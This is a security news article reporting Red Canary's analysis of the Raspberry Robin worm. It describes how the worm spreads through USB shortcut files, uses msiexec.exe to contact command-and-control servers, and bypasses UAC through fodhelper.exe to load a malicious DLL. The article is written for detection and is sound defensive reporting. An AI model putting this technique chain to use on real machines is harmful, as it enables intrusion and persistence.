Activity called ‘Raspberry Robin’ uses Microsoft Standard Installer & other legitimate processes to communicate with threat players & execute bad commands.
Wormable malware dubbed Raspberry Robin has been active since Sept. 2021 & is making its way through USB drives onto Windows machines to use Microsoft Standard Installer & other legitimate processes to install malicious files, researchers have found.
Researchers at Red Canary Intelligence 1st began tracking the malicious activity in the Autumn when it began as a handful of detections with similar characteristics 1st observed in multiple customers’ environments by Jason Killam from Red Canary’s Detection Engineering team.
Once the worm spreads via a USB drive to someone’s machine, the activity relies on msiexec.exe to call out to its infrastructure, which is often comprised of QNAP devices–using HTTP requests that contain a victim’s user & device names, Red Canary’s Lauren Podber & Stef Rand wrote in a blog post published Thurs.
TOR Exit Nodes
Researchers also observed Raspberry Robin use TOR exit nodes as additional command & control (C&C) infrastructure, they wrote. Eventually the worm installs malicious dynamic link library (DLL) files found on the infected USB.
While researchers 1st noticed Raspberry Robin as early as Sept. 2021, most of the activity observed by Red Canary occurred during Jan. of this year, they explained.
Although researchers observed various processes & executions by the malicious activity, they acknowledged that these observations have left some unanswered questions.
The team has not yet figured out how or where Raspberry Robin infects external drives to perpetuate its activity, though it is likely this infection occurs offline or “otherwise outside of our visibility,” researchers surmised.
They also do not know why Raspberry Robin installs a malicious DLL, although they believe it may be to attempt to establish persistence on an infected system–though there is not enough evidence to make this conclusive, researchers acknowledged.
However, the biggest question mark surrounding the worm is the objective of the threat players behind it, researchers said.
“Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” they acknowledged.
Initial Access & Execution
Infected removable drives—typically USB devices—introduce the Raspberry Robin worm as a shortcut LNK file masquerading as a legitimate folder on the infected USB device, researchers stated. LNK files are Windows shortcuts that point to & are used to open another file, folder, or application.
Soon after the infected drive is connected to the system, the worm updates the User Assist registry entry and records execution of a ROT13-ciphered value referencing a LNK file when deciphered. For example, researchers observed the value q:\erpbirel.yax being deciphered to d:\recovery.lnk, they wrote.
Infected External Drive
Execution commences when Raspberry Robin uses cmd.exe to read and execute a file stored on the infected external drive, researchers observed.
“The command is consistent across Raspberry Robin detections we have seen so far, making it reliable early evidence of potential worm activity,” they noted.
In the next stage of execution, cmd.exe typically launches explorer.exe & msiexec.exe. The former’s command line can be a mixed-case reference to an external device–a person’s name, like LAUREN V; or the name of the LNK file, researchers said.
The worm “also extensively uses mixed-case letters in its commands,” most likely to avoid detection, researchers added.
Raspberry Robin uses the 2nd executable launched, msiexec.exe , to attempt external network communication to a malicious domain for command & control purposes, researchers revealed.
In several examples of the activity that researchers have observed, the worm has used msiexec.exe to install a malicious DLL file although, as mentioned, they still are not certain what the purpose of the DLL is.
The worm also uses msiexec.exe to launch a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command, they explained.
“Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt,” researchers noted. As this is unusual behaviour for the utility, this activity can be used to detect the presence of Raspberry Robin on an infected machine, they stated.
The rundll32.exe command then starts another legitimate Windows utility– odbcconf.exe–and passes in additional commands to execute & configure the recently-installed malicious DLL file, researchers concluded.